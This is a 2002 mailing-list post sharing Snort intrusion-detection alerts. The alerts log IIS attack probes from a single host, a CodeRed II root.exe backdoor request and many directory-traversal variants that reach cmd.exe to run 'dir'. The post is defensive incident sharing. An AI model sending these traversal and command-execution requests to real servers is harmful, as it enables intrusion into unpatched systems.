Security Incidents mailing list archives
Textbook CodeRed v2 Caught By Snort
From: "Jeremy Junginger" <jjunginger () interactcommerce com>
Date: Fri, 28 Jun 2002 10:25:34 -0700
I just wanted to share. It appears to be a compromised host. Any
thoughts?
Generated by ACID v0.9.6b21 on Fri June 28, 2002 10:16:08
------------------------------------------------------------------------
------
#(1 - 8203) [2002-06-28 07:52:05]
[url/www.cert.org/advisories/CA-2001-19.html] WEB-IIS CodeRed v2
root.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=112 ID=64072 flags=0 offset=0 TTL=107
chksum=5814
TCP: port=4162 -> dport: 80 flags=***AP*** seq=1758262495
ack=3285962122 off=5 res=0 win=17520 urp=0 chksum=36882
Payload: length = 72
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A lose....
------------------------------------------------------------------------
------
#(1 - 8204) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=120 ID=64169 flags=0 offset=0 TTL=107
chksum=5709
TCP: port=4193 -> dport: 80 flags=***AP*** seq=1759864606
ack=3286219316 off=5 res=0 win=17520 urp=0 chksum=63927
Payload: length = 80
000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
<www..Connne>
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
------------------------------------------------------------------------
------
#(1 - 8205) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=120 ID=64219 flags=0 offset=0 TTL=107
chksum=5659
TCP: port=4208 -> dport: 80 flags=***AP*** seq=1760722868
ack=3286352844 off=5 res=0 win=17520 urp=0 chksum=55146
Payload: length = 80
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
<www..Connne>
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
------------------------------------------------------------------------
------
#(1 - 8206) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=136 ID=64274 flags=0 offset=0 TTL=107
chksum=5588
TCP: port=4230 -> dport: 80 flags=***AP*** seq=1761911317
ack=3286485480 off=5 res=0 win=17520 urp=0 chksum=31284
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
<www..Connne>
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
------------------------------------------------------------------------
------
#(1 - 8207) [2002-06-28 07:52:06] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=157 ID=64304 flags=0 offset=0 TTL=107
chksum=5537
TCP: port=4241 -> dport: 80 flags=***AP*** seq=1762498299
ack=3286554292 off=5 res=0 win=17520 urp=0 chksum=48821
Payload: length = 111
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host:
<www..C>
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
------------------------------------------------------------------------
------
#(1 - 8208) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=157 ID=64336 flags=0 offset=0 TTL=107
chksum=5505
TCP: port=4245 -> dport: 80 flags=***AP*** seq=1762733150
ack=3286642898 off=5 res=0 win=17520 urp=0 chksum=54330
Payload: length = 111
000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host:
<www..C>
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
------------------------------------------------------------------------
------
#(1 - 8209) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=185 ID=64393 flags=0 offset=0 TTL=107
chksum=5420
TCP: port=4266 -> dport: 80 flags=***AP*** seq=1763771120
ack=3286783288 off=5 res=0 win=17520 urp=0 chksum=31957
Payload: length = 127
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host:
<www..Conn>
------------------------------------------------------------------------
------
#(1 - 8210) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=137 ID=64445 flags=0 offset=0 TTL=107
chksum=5416
TCP: port=4282 -> dport: 80 flags=***AP*** seq=1764599933
ack=3286923590 off=5 res=0 win=17520 urp=0 chksum=20527
Payload: length = 93
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
<www..Connn>
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
------------------------------------------------------------------------
------
#(1 - 8211) [2002-06-28 07:52:07] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=137 ID=64576 flags=0 offset=0 TTL=107
chksum=5285
TCP: port=4296 -> dport: 80 flags=***AP*** seq=1765284633
ack=3287017192 off=5 res=0 win=17520 urp=0 chksum=27863
Payload: length = 93
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
<www..Connn>
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
------------------------------------------------------------------------
------
#(1 - 8212) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=137 ID=64681 flags=0 offset=0 TTL=107
chksum=5180
TCP: port=4317 -> dport: 80 flags=***AP*** seq=1766573669
ack=3287133452 off=5 res=0 win=17520 urp=0 chksum=64269
Payload: length = 93
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
<www..Connn>
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
------------------------------------------------------------------------
------
#(1 - 8213) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=137 ID=64745 flags=0 offset=0 TTL=107
chksum=5116
TCP: port=4343 -> dport: 80 flags=***AP*** seq=1768029370
ack=3287264240 off=5 res=0 win=17520 urp=0 chksum=51401
Payload: length = 93
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host:
<www..Connn>
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 ection: close
------------------------------------------------------------------------
------
#(1 - 8214) [2002-06-28 07:52:08] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=138 ID=64793 flags=0 offset=0 TTL=107
chksum=5067
TCP: port=4360 -> dport: 80 flags=***AP*** seq=1768931344
ack=3287372593 off=5 res=0 win=17520 urp=0 chksum=43264
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host:
<www..Conn>
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close
------------------------------------------------------------------------
------
#(1 - 8215) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=136 ID=64832 flags=0 offset=0 TTL=107
chksum=5030
TCP: port=4371 -> dport: 80 flags=***AP*** seq=1769565695
ack=3287454509 off=5 res=0 win=17520 urp=0 chksum=61686
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
<www..Connne>
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
------------------------------------------------------------------------
------
#(1 - 8216) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=140 ID=64855 flags=0 offset=0 TTL=107
chksum=5003
TCP: port=4383 -> dport: 80 flags=***AP*** seq=1770136512
ack=3287543887 off=5 res=0 win=17520 urp=0 chksum=30159
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host:
<www..Co>
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo
------------------------------------------------------------------------
------
#(1 - 8217) [2002-06-28 07:52:09] WEB-IIS cmd.exe access
IPv4: 63.225.18.129 -> x.x.x.23
hlen=5 TOS=0 dlen=136 ID=64887 flags=0 offset=0 TTL=107
chksum=4975
TCP: port=4394 -> dport: 80 flags=***AP*** seq=1770745706
ack=3287647877 off=5 res=0 win=17520 urp=0 chksum=61954
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost:
<www..Connne>
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
Attachment:
smime.p7s
Description:
Current thread:
- Textbook CodeRed v2 Caught By Snort Jeremy Junginger (Jun 28)
- Re: Textbook CodeRed v2 Caught By Snort Ryan Russell (Jun 28)
- Re: Textbook CodeRed v2 Caught By Snort Nick FitzGerald (Jun 29)